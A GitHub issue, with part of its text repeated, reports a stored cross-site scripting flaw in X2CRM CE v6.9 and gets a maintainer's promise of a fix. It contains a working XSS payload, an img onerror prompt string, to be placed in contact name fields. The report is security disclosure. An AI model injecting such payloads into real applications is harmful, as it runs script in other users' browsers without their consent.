Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Hi,
Description :
Create a contact with
first name: test"><img src=x onerror=prompt('@darknetguy');>
and last name : test2"><img src=x onerror=prompt('@darknetguy');>
( you can even delete the contact its worst!) XSS will run in to all pages than activity feed is present. ( in X2CRM CE V6.9)
Sample Pic:
Payload to use : "><img src=x onerror=prompt('@darknetguy');>
Tested on Windows 10 Firefox | Google Chrome // Cent-OS 7 Firefox | Chromium
BR,
Milad Fadavvi
The text was updated successfully, but these errors were encountered:
We will have this XSS fixed in our next release. Thank you for the info! I will keep this issue open until confirmation that the vector has been removed.
Sorry, something went wrong.
thechiangsta
No branches or pull requests
Hi,
Description :
Create a contact with
first name: test"><img src=x onerror=prompt('@darknetguy');>
and
last name : test2"><img src=x onerror=prompt('@darknetguy');>
( you can even delete the contact its worst!) XSS will run in to all pages than activity feed is present. ( in X2CRM CE V6.9)
Sample Pic:

Payload to use : "><img src=x onerror=prompt('@darknetguy');>
Tested on Windows 10 Firefox | Google Chrome // Cent-OS 7 Firefox | Chromium
BR,
Milad Fadavvi
The text was updated successfully, but these errors were encountered: